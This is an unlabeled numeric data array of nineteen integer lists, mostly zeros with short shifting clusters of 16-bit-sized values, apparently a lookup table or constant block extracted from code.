[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 51332, 24385, 21734, 41478, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 50176, 20736, 19520, 21776, 51908, 12011],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 12164, 30273, 49638, 7942, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 1024, 8448, 45120, 31248, 14084, 38177, 38026],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 38532, 36161, 12006, 39942, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 512, 53376, 20512, 42248, 24578, 12373],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 64900, 42049, 39910, 6406, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 23552, 46848, 1472, 33648, 46172, 57015, 41148],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 25732, 47937, 2278, 38406, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 11520, 62272, 15056, 24815],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 52100, 53825, 30182, 4870, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 62464, 7424, 3904, 39376, 7412, 24861, 47070],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 12932, 59713, 58086, 36870, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 47104, 44544, 23424, 23264, 56760, 37550, 4921],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 39300, 65, 20454, 3334, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 52224, 54016, 11456, 38192, 59084, 35283, 15984],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 132, 5953, 48358, 35334, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 7168, 9984, 37312, 37488, 49948, 42419],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 26500, 11841, 10726, 1798, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 58368, 22784, 48704, 36240, 22500, 47705, 38130],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 52868, 17729, 38630, 33798, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 26624, 39424, 30336, 51616, 20328, 11162, 8925],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 13700, 23617, 998, 262, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 15360, 12032, 9152, 56048, 1596, 43055, 14308],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 40068, 29505, 28902, 32262, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 43008, 10752, 14976, 58016, 4008, 57655],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 900, 35393, 56806, 64262, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 54272, 54528, 48448, 5456, 22484, 48341, 57286],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 27268, 41281, 19174, 30726, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 6144, 50688, 8576, 23648, 10776, 30406, 9025],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 53636, 47169, 47078, 62726, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 44032, 51968, 60096, 5296, 684, 30155, 41240],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 14468, 53057, 9446, 29190, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 29696, 15616, 59200, 37840, 3188, 46971],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 40836, 58945, 37350, 61190, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 50176, 37120, 3136, 61712, 36036, 50321, 3162],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 1668, 64833, 65254, 27654, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 51200, 12800, 23680, 54048, 40392, 50, 39013],
